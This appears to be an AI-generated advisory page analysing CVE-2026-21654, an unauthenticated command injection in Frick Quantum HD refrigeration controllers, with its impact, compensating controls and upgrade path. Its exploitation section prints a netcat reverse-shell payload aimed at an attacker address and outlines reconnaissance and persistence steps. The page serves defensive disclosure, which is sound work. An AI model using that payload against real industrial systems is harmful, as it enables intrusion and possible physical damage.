CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2026-21654
9.10.36%

CVE-2026-21654: Pre-Authentication Remote Code Execution in Johnson Controls Frick Quantum HD

Amit Schendel
Amit Schendel
Senior Security Researcher

Mar 2, 2026·6 min read·5 visits

No Known Exploit

Executive Summary (TL;DR)

CVE-2026-21654 is a critical (CVSS 9.1) unauthenticated RCE vulnerability in Johnson Controls Frick Quantum HD industrial controllers. It allows attackers to inject OS commands via network requests, potentially disrupting physical refrigeration processes. The vendor has declared the affected versions End of Support (EoS) and advises upgrading to the Quantum HD Unity platform.

A critical OS Command Injection vulnerability exists in Johnson Controls Frick Controls Quantum HD panels (versions 10.22 and prior), allowing unauthenticated remote attackers to execute arbitrary code with root privileges. This flaw poses severe risks to industrial refrigeration processes and safety systems.

Vulnerability Overview

CVE-2026-21654 represents a critical security failure in the Johnson Controls Frick Controls Quantum HD, a widely deployed control panel for industrial refrigeration compressors. The vulnerability is classified as an OS Command Injection (CWE-78), a flaw that occurs when an application constructs operating system commands using unsanitized user-supplied input. This specific instance allows an attacker to execute arbitrary system commands without authentication, effectively granting full control over the underlying operating system of the device.

The affected component acts as the central interface for monitoring and controlling industrial compressor units. In Operational Technology (OT) environments, these devices manage physical processes critical to food safety, cold storage, and pharmaceutical manufacturing. Compromise of a Frick Quantum HD panel extends beyond data loss; it introduces physical risks, including the potential to manipulate compressor setpoints, disable safety alarms, or cause mechanical failure through improper cycling.

Discovered by Claroty Team 82, this vulnerability highlights the precarious nature of legacy ICS equipment. The vendor has classified the affected firmware (version 10.22 and prior) as End of Support (EoS), complicating remediation efforts for asset owners who cannot immediately replace hardware or upgrade to the newer Quantum HD Unity platform.

Technical Deep Dive: Root Cause Analysis

The root cause of CVE-2026-21654 lies in the improper handling of special elements within command strings (CWE-78). The Frick Quantum HD firmware exposes specific parameters to network interfaces—likely via a web management console or a proprietary communication protocol—that are subsequently used as arguments in system shell commands. The application fails to validate this input against an allowlist or sanitize it for shell metacharacters before execution.

In a typical command injection scenario within embedded Linux or RTOS environments, the vulnerable code might construct a command string using sprintf or simple concatenation, then pass that string to a function like system(), exec(), or popen(). If an attacker supplies an input containing a command separator (such as ;, |, or &) or command substitution characters (like backticks or $()), the shell interprets the subsequent data as a new command rather than a parameter.

For this specific vulnerability, the attack surface requires no prior authentication (Privileges Required: None). This suggests the input vector is accessible via a public-facing login handler, a status monitoring API, or a pre-auth configuration endpoint. The absence of input sanitization means that any network-adjacent actor can inject payloads that execute with the privileges of the service, which, in many legacy ICS devices, defaults to root or a highly privileged administrative user.

Exploitation Methodology

Exploiting CVE-2026-21654 is straightforward for an attacker with network access to the target device. The attack follows a standard command injection methodology, leveraging the lack of authentication to bypass access controls entirely. No user interaction is required (UI:N), and the complexity is low (AC:L), making this an attractive target for automated exploitation frameworks.

  1. Reconnaissance: The attacker scans the network (e.g., using Shodan or Nmap) for ports associated with the Frick Quantum HD web interface or control protocol. Identifying the device version is often trivial via banner grabbing or accessing the login page source code.

  2. Payload Construction: The attacker crafts a network request containing a shell payload. A typical payload might look like ; /bin/sh -c 'nc -e /bin/sh 10.0.0.1 4444', designed to establish a reverse shell back to the attacker's machine. The injection point would be a specific parameter—such as a hostname, IP configuration field, or diagnostic input—that the device processes via the shell.

  3. Delivery and Execution: The malicious request is sent to the target. Because the vulnerability is pre-authentication, the device processes the request immediately. The vulnerable function concatenates the payload into a system command and executes it. The shell metacharacters terminate the legitimate command and execute the injected payload.

  4. Persistence and Control: Once code execution is achieved, the attacker can install backdoors, modify control logic files, or pivot to other devices on the OT network (Lateral Movement). In a ransomware scenario, the attacker might encrypt critical configuration files, rendering the compressor inoperable until a ransom is paid.

Impact Assessment

The impact of CVE-2026-21654 is categorized as Critical (CVSS 9.1), driven by the high confidentiality, integrity, and availability impact scores. In the context of Industrial Control Systems (ICS), the implications are severe:

  • Loss of Control: An attacker can modify operational parameters, such as temperature setpoints, pressure thresholds, and motor speeds. This can lead to spoilage of perishable goods in cold storage facilities or disrupt industrial cooling processes required for manufacturing.

  • Physical Damage: By bypassing safety logic or manipulating compressor cycles (e.g., rapid cycling), an attacker could induce mechanical stress, leading to equipment failure or hazardous conditions (e.g., ammonia leaks in refrigeration systems).

  • Lateral Movement: Compromised control panels often serve as a beachhead for moving deeper into the OT network. Attackers can use the compromised device to scan for other PLCs, HMIs, or engineering workstations (T1210 - Exploitation of Remote Services).

  • Denial of Service: The attacker can simply delete the firmware or corrupt the bootloader, bricking the device and requiring manual physical intervention to restore operations. In critical infrastructure, such downtime is unacceptable.

Remediation and Mitigation Strategy

Remediation for CVE-2026-21654 is complicated by the End of Support (EoS) status of the affected firmware versions (10.22 and prior). Johnson Controls has indicated that no patch will be released for these versions. This forces organizations to choose between hardware/platform upgrades or aggressive compensating controls.

Primary Remediation: Upgrade The only definitive fix is to migrate to the Quantum HD Unity platform (version 12 or higher). This upgrade likely involves both software and hardware changes depending on the specific model generation. Asset owners must consult the 'Quantum HD Unity Software Update Procedure' and plan for maintenance windows to perform the upgrade.

Compensating Controls (Immediate Action) For systems that cannot be immediately upgraded, the following mitigations are mandatory to reduce risk:

  • Network Isolation: Ensure the device is strictly air-gapped from the public Internet. Shodan exposure is a critical risk factor. Place the device behind a strict industrial firewall that allows traffic only from known, trusted engineering workstations.

  • VPN Access: If remote access is required, it must be mediated through a secure VPN with Multi-Factor Authentication (MFA). Direct port forwarding to the device is effectively an invitation for compromise.

  • Network Segmentation: Isolate the refrigeration control network (VLAN) from the corporate IT network. Use Access Control Lists (ACLs) to block all outbound connections from the Frick panel to the Internet, preventing reverse shell connections.

Official Patches

Johnson ControlsQuantum HD Unity Software Update Procedure

Technical Appendix

CVSS Score
9.1/ 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
EPSS Probability
0.36%
Top 43% most exploited

Affected Systems

Johnson Controls Frick Controls Quantum HD (Compressor Panel)Industrial Refrigeration Control SystemsFood and Beverage Processing InfrastructureCold Storage Management Systems

Affected Versions Detail

Product
Affected Versions
Fixed Version
Frick Controls Quantum HD
Johnson Controls
<= 10.22Quantum HD Unity v12 (Upgrade)
AttributeDetail
CVE IDCVE-2026-21654
CWE IDCWE-78 (OS Command Injection)
CVSS v3.19.1 (Critical)
Attack VectorNetwork (Pre-Auth)
ImpactRemote Code Execution / Full System Compromise
Vendor StatusEnd of Support (No Patch Available)
RemediationUpgrade to Unity v12 Platform

MITRE ATT&CK Mapping

T1059Command and Scripting Interpreter
Execution
T1210Exploitation of Remote Services
Lateral Movement
T1203Exploitation for Client Execution
Execution
CWE-78
OS Command Injection

The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Vulnerability Timeline

Vulnerability Disclosed by Claroty Team 82
2026-02-26
CISA Publishes Advisory ICSA-26-057-01
2026-02-26
Vendor Confirms End of Support for Affected Versions
2026-02-26

References & Sources

  • [1]CISA ICS Advisory ICSA-26-057-01
  • [2]Johnson Controls Security Advisory JCI-PSA-2026-05
  • [3]CVE Record - CVE-2026-21654
Related Vulnerabilities
CVE-2026-21656CVE-2026-21657CVE-2026-21658CVE-2026-21659CVE-2026-21660

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.